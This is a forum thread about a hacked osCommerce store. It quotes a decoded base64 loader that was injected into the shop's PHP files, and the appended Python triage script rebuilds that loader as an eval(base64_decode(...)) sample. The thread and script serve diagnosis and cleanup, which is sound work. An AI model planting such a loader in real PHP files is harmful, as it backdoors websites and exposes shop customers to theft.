sandyj
Posted May 5, 2011

I am running 2.2 RC2 and using the Sitemonitor security software. Today I noticed that over 2000 .php files have been edited. Small sample below:

Difference found: New-> cookie_usage.php 3775 Original-> 6933
Difference found: New-> checkout_shipping.php 20916 Original-> 1830
Difference found: New-> thumbnails.fla 221696 Original-> 11223
Difference found: New-> checkout_confirmation.php 16137 Original-> 11125

I opened a few of these files, and mostly found nothing obvious, but in checkout_shipping.php I found some base64 code. I decrypted it, and came up with this:

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
    $GLOBALS['mfsn']='/home/leatherb/public_html/admin/includes/languages/espanol/modules/newsletters/style.css.php';
    if(file_exists($GLOBALS['mfsn'])){
        include_once($GLOBALS['mfsn']);
        if(function_exists('gml')&&function_exists('dgobh')){
            ob_start('dgobh');
        }
    }
}

Is this a hacking attempt or could there be another explanation? The site seems to be working fine.

Thanks in advance,
Sandy

Taipo
Posted May 5, 2011

Attackers have been able to prepend malicious code to all the PHP files in your site; also check all the html files and .js files too. Pretty much means you need to reload your site from scratch from a backup or upgrade to 2.3.1 and start again, sorry.

There are a couple of links in my signature that are relevant to this type of attack if you want to read more on the subject.

If you intend to reload from a backup, I wrote an addon called osC_Sec which will effectively patch the security issues in 2.2.1. It's probably best, once the site is restored from a backup, that you install osC_Sec to prevent this from happening again.

When restoring from a backup, remember to also check in the images directory and other directories for files that should not be there. There will be one or a number of added files on your site that attackers have used to launch this type of attack across all or almost all php files.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

sandyj
Posted May 5, 2011

Thanks Taipo. It's a never ending battle with these hackers!

sucuri
Posted May 6, 2011

Yes, pretty much hacked. If you haven't deleted it already, can you please share the content of this file: /home/leatherb/public_html/admin/includes/languages/espanol/modules/newsletters/style.css.php ?

I am just curious as to what it is doing... (either post on paste bin or email me directly [email protected]).

Thanks!
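
Added example, not part of any post in this thread: a static triage script for the kind of injected prefix sandyj describes, which decodes base64 literals without executing them and pulls out the loader file path and the `ob_start` callback name so the dropped file can be located. It assumes the prefix is wrapped as `eval(base64_decode('...'))`, which the thread does not show; the sample path and the names `decode_literals` and `triage` are constructed for illustration.

```python
import base64
import binascii
import re

# Long base64 string literals in PHP source (quote, 40+ base64 chars, quote).
B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/]{40,}={0,2})\1""")
# Absolute paths ending in .php inside a decoded payload.
PHP_PATH = re.compile(r"""['"](/[^'"]+\.php)['"]""")
# Output-buffer callback registration, e.g. ob_start('dgobh').
OB_CALLBACK = re.compile(r"""ob_start\(\s*['"](\w+)['"]\s*\)""")

def decode_literals(php_source):
    """Statically decode base64 literals; nothing is ever executed."""
    decoded = []
    for match in B64_LITERAL.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(2), validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("latin-1")
        # Keep only payloads that look like PHP, not images or tokens.
        if "include" in text or "ob_start" in text or "eval" in text:
            decoded.append(text)
    return decoded

def triage(php_source):
    """Return loader file paths and ob_start callbacks found in payloads."""
    paths, callbacks = set(), set()
    for payload in decode_literals(php_source):
        paths.update(PHP_PATH.findall(payload))
        callbacks.update(OB_CALLBACK.findall(payload))
    return {"paths": sorted(paths), "callbacks": sorted(callbacks)}

# Constructed sample: the payload quoted in the thread with a placeholder path,
# wrapped in the assumed eval(base64_decode(...)) prefix.
SAMPLE_PAYLOAD = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){"
    "$GLOBALS['mfsn']='/home/example/public_html/images/style.css.php';"
    "if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);"
    "if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"
)
SAMPLE_FILE = "<?php eval(base64_decode('%s')); ?><?php // original file\n" % (
    base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
)

if __name__ == "__main__":
    print(triage(SAMPLE_FILE))
```

Run `triage` over the contents of each changed file from the integrity report; every path it returns is a candidate for the added files Taipo says to look for.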